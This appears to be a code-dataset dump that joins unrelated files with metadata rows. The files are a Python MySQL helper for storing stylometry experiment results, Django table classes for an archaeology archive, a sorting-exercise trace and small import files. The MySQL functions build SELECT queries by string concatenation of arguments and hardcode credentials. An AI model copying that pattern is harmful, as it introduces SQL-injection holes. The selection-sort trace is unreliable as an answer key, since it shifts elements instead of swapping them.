| 39.412073 | 126 | 0.620605 | 1,907 | 15,016 | 4.531201 | 0.054536 | 0.096285 | 0.091656 | 0.062956 | 0.866566 | 0.856845 | 0.839023 | 0.815878 | 0.780697 | 0.758824 | 0 | 0.005356 | 0.266383 | 15,016 | 380 | 127 | 39.515789 | 0.779049 | 0.001399 | 0 | 0.706625 | 0 | 0 | 0.041089 | 0 | 0 | 0 | 0 | 0 | 0.072555 | 1 | 0.050473 | false | 0 | 0.018927 | 0 | 0.078864 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
307efd07a51a0e0eb0b5ab215f81ee5e30890d47 | 11,747 | py | Python | fyp/UpdateDB.py | Ninad998/deepstylometry-python | 1cc9776d6624311a31f081852da9cbf08f23c350 | [
"MIT"
] | 1 | 2021-05-20T13:05:36.000Z | 2021-05-20T13:05:36.000Z | fyp/UpdateDB.py | ntungare/deepstylometry-python | 1cc9776d6624311a31f081852da9cbf08f23c350 | [
"MIT"
] | null | null | null | fyp/UpdateDB.py | ntungare/deepstylometry-python | 1cc9776d6624311a31f081852da9cbf08f23c350 | [
"MIT"
] | 1 | 2018-12-11T19:11:51.000Z | 2018-12-11T19:11:51.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import nltk.tokenize
import MySQLdb
import pandas as pd
import sys
def checkCNN(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsCNN WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return True
else:
return False
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def updateresultCNN(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
train_acc = 0.0, val_acc = 0.0,
test_acc = 0.0, test_bin = 0.0,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsCNN WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return False
else:
cursor.execute("""INSERT INTO readingsCNN
(doc_id, candidates, dimensions, samples, iterations, dropout,
train_acc, val_acc, test_acc, test_bin, test)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s); """,
(str(doc_id), str(candidate), str(dimensions),
str(samples), str(iterations), str(dropout),
str(train_acc), str(val_acc),
str(test_acc), str(test_bin),
str(test)))
conn.commit()
return True
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def checkOldCNN(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldCNN WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return True
else:
return False
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def updateresultOldCNN(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
train_acc = 0.0, val_acc = 0.0,
test_acc = 0.0, test_bin = 0.0,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldCNN WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return False
else:
cursor.execute("""INSERT INTO readingsOldCNN
(doc_id, candidates, dimensions, samples, iterations, dropout, train_acc, val_acc, test)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s); """,
(str(doc_id), str(candidate), str(dimensions),
str(samples), str(iterations), str(dropout),
str(train_acc), str(val_acc),
str(test)))
conn.commit()
return True
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def checkOldML(doc_id = 0, candidate = 4, samples = 300,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldML WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND samples = " + str(samples)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return True
else:
return False
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def updateresultOldML(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
train_acc = 0.0, val_acc = 0.0,
test_acc = 0.0, test_bin = 0.0,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldML WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND samples = " + str(samples)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return False
else:
cursor.execute("""INSERT INTO readingsOldML
(doc_id, candidates, samples, train_acc, val_acc, test_acc, test_bin, test)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s); """,
(str(doc_id), str(candidate),
str(samples),
str(train_acc), str(val_acc),
str(test_acc), str(test_bin),
str(test)))
conn.commit()
return True
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def checkOldCNNDiffBoth(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldCNNDiffBoth WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return True
else:
return False
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def updateresultOldCNNDiffBoth(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
train_acc_cnn = 0.0, val_acc_cnn = 0.0,
test_acc_cnn = 0.0, test_bin_cnn = 0.0,
train_acc_ml = 0.0, val_acc_ml = 0.0,
test_acc_ml = 0.0, test_bin_ml = 0.0,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldCNNDiffBoth WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return False
else:
cursor.execute("""INSERT INTO readingsOldCNNDiffBoth
(doc_id, candidates, dimensions, samples, iterations, dropout,
train_acc_cnn, val_acc_cnn, test_acc_cnn, test_bin_cnn,
train_acc_ml, val_acc_ml, test_acc_ml, test_bin_ml,
test)
VALUES (%s, %s, %s, %s, %s, %s,
%s, %s, %s, %s,
%s, %s, %s, %s,
%s); """,
(str(doc_id), str(candidate), str(dimensions),
str(samples), str(iterations), str(dropout),
str(train_acc_cnn), str(val_acc_cnn),
str(test_acc_cnn), str(test_bin_cnn),
str(train_acc_ml), str(val_acc_ml),
str(test_acc_ml), str(test_bin_ml),
str(test)))
conn.commit()
return True
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
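The check*/updateresult* functions above differ mainly in the table name and filter columns, and they splice values straight into the SQL text. The shared SELECT could instead be built once with MySQLdb-style `%s` placeholders, leaving only the table and column names as trusted constants (the driver cannot bind identifiers). `build_exists_query` is a hypothetical helper, not part of the original module:

```python
def build_exists_query(table, columns):
    """Build a parameterized existence check for MySQLdb (%s placeholders)."""
    clauses = " AND ".join("{0} = %s".format(col) for col in columns)
    return "SELECT 1 FROM {0} WHERE {1} LIMIT 1;".format(table, clauses)


# usage with an open cursor:
#   cursor.execute(build_exists_query("readingsCNN",
#                                     ["doc_id", "candidates", "dimensions"]),
#                  (doc_id, candidate, dimensions))
#   exists = cursor.fetchone() is not None
```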
| 33.183616 | 124 | 0.497574 | 1,317 | 11,747 | 4.349279 | 0.073652 | 0.013617 | 0.018331 | 0.021648 | 0.90817 | 0.897346 | 0.897346 | 0.897346 | 0.897346 | 0.887395 | 0 | 0.031542 | 0.371159 | 11,747 | 353 | 125 | 33.27762 | 0.743874 | 0.003235 | 0 | 0.856061 | 0 | 0.011364 | 0.217135 | 0.005638 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0.030303 | 0.018939 | 0 | 0.109848 | 0.064394 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
063434da84f34de703144d00bf5a06f571e102eb | 135 | py | Python | tfkit/model/tagcrf/__init__.py | fossabot/TFkit | aade08634171eaee41e3d687b0f65259bef8fe43 | [
"Apache-2.0"
] | null | null | null | tfkit/model/tagcrf/__init__.py | fossabot/TFkit | aade08634171eaee41e3d687b0f65259bef8fe43 | [
"Apache-2.0"
] | null | null | null | tfkit/model/tagcrf/__init__.py | fossabot/TFkit | aade08634171eaee41e3d687b0f65259bef8fe43 | [
"Apache-2.0"
] | null | null | null | from .dataloader import get_data_from_file_col, get_data_from_file, get_feature_from_data, preprocessing_data
from .model import Model
| 45 | 109 | 0.881481 | 22 | 135 | 4.909091 | 0.454545 | 0.222222 | 0.203704 | 0.277778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081481 | 135 | 2 | 110 | 67.5 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
065a43f0da8be74309a4294ffb6b27605f261f46 | 376 | py | Python | chapter-13/exercise04.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | chapter-13/exercise04.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | chapter-13/exercise04.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | '''
[6, 5, 4, 3, 7, 1, 2]
Selection sort:
- [1, 6, 5, 4, 3, 7, 2]
- [1, 2, 6, 5, 4, 3, 7]
- [1, 2, 3, 6, 5, 4, 7]
- [1, 2, 3, 4, 6, 5, 7]
- [1, 2, 3, 4, 5, 6, 7]
- [1, 2, 3, 4, 5, 6, 7]
- [1, 2, 3, 4, 5, 6, 7]
Insertion sort:
- [5, 6, 4, 3, 7, 1, 2]
- [4, 5, 6, 3, 7, 1, 2]
- [3, 4, 5, 6, 7, 1, 2]
- [3, 4, 5, 6, 7, 1, 2]
- [1, 3, 4, 5, 6, 7, 2]
- [1, 2, 3, 4, 5, 6, 7]
''' | 18.8 | 23 | 0.329787 | 102 | 376 | 1.215686 | 0.098039 | 0.193548 | 0.241935 | 0.225806 | 0.66129 | 0.483871 | 0.483871 | 0.314516 | 0.314516 | 0.314516 | 0 | 0.381323 | 0.316489 | 376 | 20 | 24 | 18.8 | 0.101167 | 0.976064 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
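The passes written out above can be checked mechanically. Note that there are two common selection-sort variants: the trace above moves each minimum to the front by shifting the rest of the list, while the swap-based variant (the one most textbooks implement) gives `[1, 5, 4, 3, 7, 6, 2]` after its first pass. A sketch of both sorts that yields the list after each pass:

```python
def selection_sort_passes(items):
    """Swap-based selection sort; yields a snapshot after each pass."""
    lst = list(items)
    for i in range(len(lst)):
        m = min(range(i, len(lst)), key=lst.__getitem__)
        lst[i], lst[m] = lst[m], lst[i]
        yield list(lst)


def insertion_sort_passes(items):
    """Insertion sort; yields a snapshot after each item is inserted."""
    lst = list(items)
    for i in range(1, len(lst)):
        item = lst.pop(i)
        j = 0
        while j < i and lst[j] <= item:
            j += 1
        lst.insert(j, item)
        yield list(lst)


# list(insertion_sort_passes([6, 5, 4, 3, 7, 1, 2])) reproduces the
# insertion-sort trace above line by line.
```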
88d979396a9fdd67ea25ac17745fc12ba171f18d | 13,465 | py | Python | archiv/tables.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
] | null | null | null | archiv/tables.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
] | 6 | 2020-06-05T18:32:02.000Z | 2022-02-10T07:22:24.000Z | archiv/tables.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
] | 1 | 2020-06-30T13:52:41.000Z | 2020-06-30T13:52:41.000Z | # generated by appcreator
import django_tables2 as tables
from django_tables2.utils import A
from browsing.browsing_utils import MergeColumn
from . models import (
Actor,
ArchaeologicalObject4DPuzzleID,
ArchaeologicalObjectID,
ArchiveINF,
AutoCAD,
Convolutecards,
Datenbase,
Document4DPuzzleID,
DocumentTypes,
ExcavationObjectID,
ExcavationSeasons,
Fielddrawing,
Film,
Finddrawing,
Findsheets,
Fotoborndigital,
Fotosgescannt,
Fundinventar4DPuzzleID,
FundinventarInventarnummern,
FundinventarKonvolutnummern,
FundinventarMaterialproben,
FundinventarSteininventar,
GIS,
Geophysics,
Inventorybooks,
PhasenID,
Protocols,
StratenID,
Tables,
ThreeDimensionalModel,
Videos,
WallpaintingInventory
)
class ActorTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = Actor
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ArchaeologicalObject4DPuzzleIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = ArchaeologicalObject4DPuzzleID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ArchaeologicalObjectIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
corresponding_to_archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = ArchaeologicalObjectID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ArchiveINFTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = ArchiveINF
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class AutoCADTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = AutoCAD
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ConvolutecardsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_id = tables.columns.ManyToManyColumn()
class Meta:
model = Convolutecards
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class DatenbaseTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Datenbase
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class Document4DPuzzleIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = Document4DPuzzleID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class DocumentTypesTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = DocumentTypes
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ExcavationObjectIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_id = tables.columns.ManyToManyColumn()
part_of_excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = ExcavationObjectID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ExcavationSeasonsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = ExcavationSeasons
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FielddrawingTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
document_type = tables.columns.ManyToManyColumn()
creator_metadata = tables.columns.ManyToManyColumn()
creator_original = tables.columns.ManyToManyColumn()
original_material = tables.columns.ManyToManyColumn()
amendment_drawn_by = tables.columns.ManyToManyColumn()
drawer_monogram = tables.columns.ManyToManyColumn()
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
excavation_id = tables.columns.ManyToManyColumn()
class Meta:
model = Fielddrawing
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FilmTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_id = tables.columns.ManyToManyColumn()
class Meta:
model = Film
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FinddrawingTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = Finddrawing
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FindsheetsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Findsheets
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FotoborndigitalTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Fotoborndigital
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FotosgescanntTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_id = tables.columns.ManyToManyColumn()
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Fotosgescannt
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class Fundinventar4DPuzzleIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = Fundinventar4DPuzzleID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FundinventarInventarnummernTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = FundinventarInventarnummern
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FundinventarKonvolutnummernTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
find_material = tables.columns.ManyToManyColumn()
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = FundinventarKonvolutnummern
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FundinventarMaterialprobenTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = FundinventarMaterialproben
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class FundinventarSteininventarTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = FundinventarSteininventar
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class GISTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = GIS
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class GeophysicsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Geophysics
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class InventorybooksTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
find_inventory_number = tables.columns.ManyToManyColumn()
class Meta:
model = Inventorybooks
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class PhasenIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
area = tables.columns.ManyToManyColumn()
containing_phase_id = tables.columns.ManyToManyColumn()
class Meta:
model = PhasenID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ProtocolsTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
document_type = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Protocols
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class StratenIDTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
area = tables.columns.ManyToManyColumn()
containing_stratum_id = tables.columns.ManyToManyColumn()
class Meta:
model = StratenID
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class TablesTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
relatedto = tables.columns.ManyToManyColumn()
class Meta:
model = Tables
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class ThreeDimensionalModelTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = ThreeDimensionalModel
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class VideosTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
excavation_object_id = tables.columns.ManyToManyColumn()
archaeological_object_id = tables.columns.ManyToManyColumn()
class Meta:
model = Videos
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
class WallpaintingInventoryTable(tables.Table):
id = tables.LinkColumn(verbose_name='ID')
merge = MergeColumn(verbose_name='keep | remove', accessor='pk')
class Meta:
model = WallpaintingInventory
sequence = ('id',)
attrs = {"class": "table table-responsive table-hover"}
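Every generated class above repeats the same `id`/`merge`/`Meta` boilerplate and differs only in its model and its extra `ManyToManyColumn` fields. A hedged sketch of how that repetition could be collapsed with a class factory — plain-Python stand-ins are used here so the sketch is self-contained; in the real file the base class would be `tables.Table` and the column values would be real `django_tables2` column instances:

```python
def make_table(name, model, m2m_fields=()):
    """Build a table class for `model`, attaching one placeholder column
    per many-to-many field name (stand-in for ManyToManyColumn)."""
    meta = type("Meta", (), {
        "model": model,
        "sequence": ("id",),
        "attrs": {"class": "table table-responsive table-hover"},
    })
    attrs = {field: f"ManyToManyColumn:{field}" for field in m2m_fields}
    attrs["Meta"] = meta
    return type(name, (object,), attrs)

class Film:  # stand-in for the imported model
    pass

FilmTable = make_table("FilmTable", Film, m2m_fields=("excavation_id",))
```

This is only a design sketch; since the file is autogenerated by appcreator, the repetition may be an acceptable trade-off for regenerability.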
| 30.326577 | 81 | 0.687783 | 1,337 | 13,465 | 6.815258 | 0.090501 | 0.059701 | 0.165496 | 0.122476 | 0.787752 | 0.787752 | 0.783033 | 0.76745 | 0.761414 | 0.742098 | 0 | 0.001015 | 0.195098 | 13,465 | 443 | 82 | 30.395034 | 0.839731 | 0.001708 | 0 | 0.642173 | 1 | 0 | 0.138095 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.01278 | 0 | 0.587859 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
cc63f54e3207a1bbf4fb63fc52cea799c5044f82 | 45 | py | Python | examples/phobos/tests/test_std_algorithm.py | kinke/autowrap | 2f042df3f292aa39b1da0b9607fbe3424f56ff4a | [
"BSD-3-Clause"
] | 47 | 2019-07-16T10:38:07.000Z | 2022-03-30T16:34:24.000Z | examples/phobos/tests/test_std_algorithm.py | kinke/autowrap | 2f042df3f292aa39b1da0b9607fbe3424f56ff4a | [
"BSD-3-Clause"
] | 199 | 2019-06-17T23:24:40.000Z | 2021-06-16T16:41:36.000Z | examples/phobos/tests/test_std_algorithm.py | kinke/autowrap | 2f042df3f292aa39b1da0b9607fbe3424f56ff4a | [
"BSD-3-Clause"
] | 7 | 2019-09-13T18:03:49.000Z | 2022-01-17T03:53:00.000Z | def test_import():
import std_algorithm
